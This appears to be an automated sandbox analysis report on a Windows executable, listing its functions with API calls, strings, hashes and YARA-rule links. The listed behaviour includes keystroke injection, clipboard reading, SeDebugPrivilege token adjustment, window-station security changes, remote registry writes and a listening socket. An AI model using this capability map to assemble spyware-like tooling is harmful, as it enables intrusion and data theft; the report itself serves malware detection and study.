String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 3166169540-564504941
Opcode ID: 5cca9c1dc11ed5bd1d7c88dd2f6383f7dfdf6b5e94c701f294cdb674b131107a
Instruction ID: a673e25fbbcae3736de2a0de1406857895e79b1c81ca45ca4dca205208ffab7a
Opcode Fuzzy Hash: 5cca9c1dc11ed5bd1d7c88dd2f6383f7dfdf6b5e94c701f294cdb674b131107a
Instruction Fuzzy Hash: E1516C75901A0ABFDB10DBF9AC48ABE7BBCBF85740B250525F705E6090DB719942CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C4A35, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 009C4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009FDA8E
IsIconic.USER32 ref: 009FDA97
ShowWindow.USER32(?,00000009), ref: 009FDAA4
SetForegroundWindow.USER32(?), ref: 009FDAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009FDAC4
GetCurrentThreadId.KERNEL32 ref: 009FDACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 009FDAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 009FDAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 009FDAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 009FDAF8
SetForegroundWindow.USER32(?), ref: 009FDAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 009FDB10
keybd_event.USER32 ref: 009FDB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 009FDB25
keybd_event.USER32 ref: 009FDB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 009FDB33
keybd_event.USER32 ref: 009FDB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 009FDB42
keybd_event.USER32 ref: 009FDB47
SetForegroundWindow.USER32(?), ref: 009FDB4A
AttachThreadInput.USER32(?,?,00000000), ref: 009FDB71

Strings

Shell_TrayWnd, xrefs: 009FDA89

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 87efbc146c592d9992b0e6724558596a6b9547a62a494a6189175826eb85a823
Instruction ID: c4e98b061869f70cd267de5e0d240059b8e55481ff0d424b2d62994a593b0c96
Opcode Fuzzy Hash: 87efbc146c592d9992b0e6724558596a6b9547a62a494a6189175826eb85a823
Instruction Fuzzy Hash: 3831E579A8120CBFEB21AFA19C49F7F7E6CEB85B51F114025FA00E61D0C6714901ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A3425A, Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A34284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00A34292
GetClipboardData.USER32(0000000D), ref: 00A3429A
CloseClipboard.USER32 ref: 00A342A6
GlobalLock.KERNEL32 ref: 00A342C2
CloseClipboard.USER32 ref: 00A342CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A342E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00A342EE
GetClipboardData.USER32(00000001), ref: 00A342F6
GlobalLock.KERNEL32 ref: 00A34303
GlobalUnlock.KERNEL32(00000000,00000000,?,00000000), ref: 00A34337
CloseClipboard.USER32(00000001,00000000), ref: 00A34447

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 2032db1ca868f8c782e09891175b28e275e9a4b8b15e397adafaae3416ffffc4
Instruction ID: c98d79fdf86f277f45b063a8cbf168f711fb8a1f1506fbd76f6a381d6055585f
Opcode Fuzzy Hash: 2032db1ca868f8c782e09891175b28e275e9a4b8b15e397adafaae3416ffffc4
Instruction Fuzzy Hash: 9B517D39204301AFD311EFA4EC86FAFB7A8AFC9B00F114529F556D61A1DF71E9058B62

Uniqueness

Uniqueness Score: -1.00%

Function 00A18858, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 00A18CC3: LookupPrivilegeValueW.ADVAPI32(?,00000000,00000004), ref: 00A18D0D
Part of subcall function 00A18CC3: AdjustTokenPrivileges.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A18D3A
Part of subcall function 00A18CC3: GetLastError.KERNEL32(?,00000000,?), ref: 00A18D47

DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,00000001,00000000,?,00000001,?,?,?,?,00000000), ref: 00A188ED
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A3FCCB,?,?), ref: 00A188FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A18915
GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00A3FCCB,?,?,?), ref: 00A1892E
SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A3FCCB,?,?), ref: 00A18938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A18952

Part of subcall function 00A18713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00A3ED3E,00000002,00000000,00000005,00000000,?,SeDebugPrivilege), ref: 00A18728
Part of subcall function 00A18713: CloseHandle.KERNEL32(?,00000000,00A3ED3E,00000002,00000000,00000005,00000000,?,SeDebugPrivilege), ref: 00A1873A

Strings

winsta0, xrefs: 00A18910
default, xrefs: 00A1894D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
String ID: default$winsta0
API String ID: 3576815822-3467173714
Opcode ID: b982d3c97fbdf8f740d6a888533c3473bf09242ff78281777fbcd05ccbe6d5f5
Instruction ID: b4a11d38d9d1d2c8f932bb0485f5031febd417fdb338649899e71adb0e1a9151
Opcode Fuzzy Hash: b982d3c97fbdf8f740d6a888533c3473bf09242ff78281777fbcd05ccbe6d5f5
Instruction Fuzzy Hash: BA819A75800249BFDF11DFE0DC45AEEBBB8EF45385F08412AF810A2160CB3A8E85DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A40AE2, Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A40BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A4F910,00000000,?,00000000,?,?), ref: 00A40C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A40C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A40D1D
RegCloseKey.ADVAPI32(?), ref: 00A4103D
RegCloseKey.ADVAPI32(00000000), ref: 00A4104A

Strings

REG_BINARY, xrefs: 00A40FD8
REG_EXPAND_SZ, xrefs: 00A40CBA
REG_SZ, xrefs: 00A40D5B
REG_QWORD, xrefs: 00A40F8B
REG_MULTI_SZ, xrefs: 00A40E05
REG_DWORD, xrefs: 00A40F0E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 58d1d0c8cd9ea67413d59f8d83e5c04f43e1e2d7f5191ce9e07b8395e867478b
Instruction ID: cf973c720265d9c32c0b64a2b49750d6c2c05a908a45e1ef71e20ab5572b2377
Opcode Fuzzy Hash: 58d1d0c8cd9ea67413d59f8d83e5c04f43e1e2d7f5191ce9e07b8395e867478b
Instruction Fuzzy Hash: 5E0238796006119FCB14DF29C995F2AB7E5AFC8710F05885DF98A9B362CB31ED41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A2F200, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76D261D0,?,00000000), ref: 00A2F221
GetFileAttributesW.KERNEL32(?), ref: 00A2F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00A2F279
FindNextFileW.KERNEL32(00000000,?), ref: 00A2F291
FindClose.KERNEL32(00000000), ref: 00A2F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00A2F2B8
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2F308
SetCurrentDirectoryW.KERNEL32(00A7A5A0), ref: 00A2F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A2F330
FindClose.KERNEL32(00000000), ref: 00A2F33D
FindClose.KERNEL32(00000000), ref: 00A2F34F

Strings

*.*, xrefs: 00A2F2B3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: ed79898d7c95d85caa1ebd32d82029afcb039c9135a99bb20d6b7b7e2617dd16
Instruction ID: 9a533cdaee374323ad3b38d44385a0375c5d21f9a1ef08e47d8d8d40b6687e55
Opcode Fuzzy Hash: ed79898d7c95d85caa1ebd32d82029afcb039c9135a99bb20d6b7b7e2617dd16
Instruction Fuzzy Hash: D031C17A501228BEDB10DBA4EC49EDE77BCAB8A321F104576F524D2090EB71DA42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A181F7, Relevance: 19.7, APIs: 13, Instructions: 186memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1874A: GetUserObjectSecurity.USER32 ref: 00A18766
Part of subcall function 00A1874A: GetLastError.KERNEL32(?,?,?,?,?), ref: 00A18770
Part of subcall function 00A1874A: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?), ref: 00A1877F
Part of subcall function 00A1874A: HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00A18786
Part of subcall function 00A1874A: GetUserObjectSecurity.USER32 ref: 00A1879D

Part of subcall function 00A187E7: GetProcessHeap.KERNEL32(00000008,00000001,00000000,00000000,?,00A1843D,?,00000000,00000000,00000000), ref: 00A187F3
Part of subcall function 00A187E7: HeapAlloc.KERNEL32(00000000,?,00A1843D,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A189A7), ref: 00A187FA
Part of subcall function 00A187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A1843D,?,00000000,00000000,00000000), ref: 00A1880B

GetSecurityDescriptorDacl.ADVAPI32(?,000F01FF,?,?,00000000,00000000,00000000,?,?,?,?,00A189C8,00000000,00000001,00000400), ref: 00A1825B
GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000), ref: 00A1828F
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001,00000400), ref: 00A182A0
GetAce.ADVAPI32(?,00000000,00000400,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001), ref: 00A182DD
AddAce.ADVAPI32(00000000,00000002,000000FF,00000400,?,?,?,?,?,?,?,?,?,?,?,00A189C8), ref: 00A182F9
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001,00000400), ref: 00A18316
GetProcessHeap.KERNEL32(00000008,-00000008,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001,00000400), ref: 00A18325
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001,00000400), ref: 00A1832C
GetLengthSid.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001), ref: 00A1834D
CopySid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000,00000001,00000400), ref: 00A18354
AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,00A189C8), ref: 00A18385
SetSecurityDescriptorDacl.ADVAPI32(00000001,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00A189C8,00000000), ref: 00A183AB
SetUserObjectSecurity.USER32 ref: 00A183BF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1795222879-0
Opcode ID: 47660475b583248f292801a8698ec4342a012dced59330267edb8a55c5d9d1af
Instruction ID: 91c0d315a96b667629293a2427c42a5e0cad0c33001f99de0220e0a794371489
Opcode Fuzzy Hash: 47660475b583248f292801a8698ec4342a012dced59330267edb8a55c5d9d1af
Instruction Fuzzy Hash: 0261AE75900109EFDF04CFA0DD45EEEBBB8FF85304F14852AF821AA291DB399A41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A2F35D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 115fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76D261D0,?,00000000), ref: 00A2F37E
FindNextFileW.KERNEL32(00000000,?), ref: 00A2F3D9
FindClose.KERNEL32(00000000), ref: 00A2F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00A2F400
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2F450
SetCurrentDirectoryW.KERNEL32(00A7A5A0), ref: 00A2F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A2F478
FindClose.KERNEL32(00000000), ref: 00A2F485
FindClose.KERNEL32(00000000), ref: 00A2F497

Part of subcall function 00A245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A245DC

Strings

*.*, xrefs: 00A2F3FB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 7003f6f57417a5140691b68d10bd9efe742671ed922498a3c417270c457d84a7
Instruction ID: 4b3dc348608f46708a43ea711651091720928c5d376ba853f6445fd49420f4ce
Opcode Fuzzy Hash: 7003f6f57417a5140691b68d10bd9efe742671ed922498a3c417270c457d84a7
Instruction Fuzzy Hash: C231C2765011297EDB10EBA8FC88AEF77BCAF89365F104275E454A30A0D7B1DE45CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A40665, Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A40038,?,?), ref: 00A410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A40737
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A407D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A4086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A40AAD
RegCloseKey.ADVAPI32(00000000), ref: 00A40ABA

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper
String ID:
API String ID: 1724414362-0
Opcode ID: 1331ab1159e074b823bbfdc756d9518107529fb233c1ea4af579d0b6bec21f81
Instruction ID: 09acf9e987de3ae67b9046f64eda3ca2eae6ce5285f048a23f4bbc391ae77a16
Opcode Fuzzy Hash: 1331ab1159e074b823bbfdc756d9518107529fb233c1ea4af579d0b6bec21f81
Instruction Fuzzy Hash: 97E15B35604210AFCB14DF29C995E2ABBF4EFC9714B04896DF58ADB262DB31ED01CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A20219, Relevance: 16.6, APIs: 11, Instructions: 124keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,?), ref: 00A20241
GetAsyncKeyState.USER32(000000A0), ref: 00A202C2
GetKeyState.USER32(000000A0), ref: 00A202DD
GetAsyncKeyState.USER32(000000A1), ref: 00A202F7
GetKeyState.USER32(000000A1), ref: 00A2030C
GetAsyncKeyState.USER32(00000011), ref: 00A20324
GetKeyState.USER32(00000011), ref: 00A20336
GetAsyncKeyState.USER32(00000012), ref: 00A2034E
GetKeyState.USER32(00000012), ref: 00A20360
GetAsyncKeyState.USER32(0000005B), ref: 00A20378
GetKeyState.USER32(0000005B), ref: 00A2038A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 0e98ab7f0e0ad3c5bda68657c2cce7a7a788e265dc8e8fc6dae63dfc36b156c2
Instruction ID: 6de88818f0c40b82cf08b0d15ce289594d720a421d058435e1369e07f0696aba
Opcode Fuzzy Hash: 0e98ab7f0e0ad3c5bda68657c2cce7a7a788e265dc8e8fc6dae63dfc36b156c2
Instruction Fuzzy Hash: 7A41A9345047D9AEFF31CBA8A808BF6BEA0AB12344F08407ED6C65A5C3D79559C4C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C9C7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A2C9F8
FindClose.KERNEL32(00000000), ref: 00A2CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A2CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A2CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A2CAAF

Strings

%4d, xrefs: 00A2CB38
%4d%02d%02d%02d%02d%02d, xrefs: 00A2CAF5
%02d, xrefs: 00A2CB86, 00A2CB90, 00A2CBDE, 00A2CC2D, 00A2CC7C, 00A2CCCB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3238362701-2428617273
Opcode ID: 6ab6fb8b781989152510d23dc0fcba96f7db8bef6bee0ca94d9d619d6dfd7898
Instruction ID: 3108c4ee35265937c188402716d0f8694fbca94f991cfa10bcb62943a3636ec6
Opcode Fuzzy Hash: 6ab6fb8b781989152510d23dc0fcba96f7db8bef6bee0ca94d9d619d6dfd7898
Instruction Fuzzy Hash: AEA11CB1908344AFC700EBA5C985FAFB7ECAFD5700F40492DB58687191EA74DA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A23A2B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 173fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C48A1,?,?,009C37C0,?), ref: 009C48CE

Part of subcall function 00A24CD3: GetFileAttributesW.KERNELBASE(?,00A24FAB), ref: 00A24CD4

FindFirstFileW.KERNEL32(?,?,00000003,?,?), ref: 00A23ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A23B87
MoveFileW.KERNEL32(?,?), ref: 00A23B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A23BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A23BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A23BF5

Strings

\*.*, xrefs: 00A23A8A, 00A23A93, 00A23AA8

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 489526d5444388afa51fbe565045222fc324548890c5abcd41d59980a93abc3e
Instruction ID: c313a70551c49025671593100183dfa62481013f5e8d53ae8bdb9bcb3f46dbd4
Opcode Fuzzy Hash: 489526d5444388afa51fbe565045222fc324548890c5abcd41d59980a93abc3e
Instruction Fuzzy Hash: CA516B32C0115CAECF05EBE4EE92EEEB778AF96300F244169E44276091DF256F09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D710E, Relevance: 12.7, Strings: 6, Instructions: 5196COMMON

Download Yara Rule

Strings

\b(?<=\w), xrefs: 00A13C41
[:>:]], xrefs: 009D760A
[:<:]], xrefs: 009D75F1
\b(?=\w), xrefs: 00A13C34
Q\E, xrefs: 009D81C1
DEFINE, xrefs: 00A125AF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 0-1798697756
Opcode ID: f21c2425fae79527091684dd8db13bdb90ebdf61cd939fc5e560dbe29e740d2c
Instruction ID: aa641c278b07b549749c99e4ec9f37fdfc3956d0aeaf3fb3d58750afde2762c6
Opcode Fuzzy Hash: f21c2425fae79527091684dd8db13bdb90ebdf61cd939fc5e560dbe29e740d2c
Instruction Fuzzy Hash: 1293AE76A442199FDB24CF98D881BEDB7B1FF48310F24856AE955AB380E7709EC1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F418A, Relevance: 10.8, APIs: 7, Instructions: 274timeCOMMON

Download Yara Rule

APIs

Part of subcall function 009E9E4B: EnterCriticalSection.KERNEL32(?,?,009E9CBC,0000000D), ref: 009E9E76

_free.LIBCMT ref: 009F424A

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

_strlen.LIBCMT ref: 009F4251
_strlen.LIBCMT ref: 009F4276
_free.LIBCMT ref: 009F42A8
GetTimeZoneInformation.KERNEL32(00A84AF8,00000000,00000000,00000000,00000000,00000000,00A7C070,00000030,009F3F3B,00A7C050,00000008,009E70B8), ref: 009F42B9
WideCharToMultiByte.KERNEL32(?,00000000,00A84AFC,000000FF,?,0000003F,00000000,?), ref: 009F4332
WideCharToMultiByte.KERNEL32(?,00000000,00A84B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 009F436B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
String ID:
API String ID: 3932404229-0
Opcode ID: 43e51d1cfe5d360aa0c525e77408d00b3f6ee2e93fcc1974e67604c6d7879665
Instruction ID: 0e4f2f5d8c121d8c099030c8ca7150f59793210f06e77de81d3a96f80e4b4da2
Opcode Fuzzy Hash: 43e51d1cfe5d360aa0c525e77408d00b3f6ee2e93fcc1974e67604c6d7879665
Instruction Fuzzy Hash: 83A1B170C0024D9EDF15DFA9D885BBEBBF8BB49710F14402AE660BB2A1D7748D42CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00A36596, Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A365EF
WSAGetLastError.WSOCK32(00000000), ref: 00A365FE
bind.WSOCK32(00000000,?,00000010), ref: 00A3661A
listen.WSOCK32(00000000,00000005), ref: 00A36629
WSAGetLastError.WSOCK32(00000000), ref: 00A36643
closesocket.WSOCK32(00000000,00000000), ref: 00A36657

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

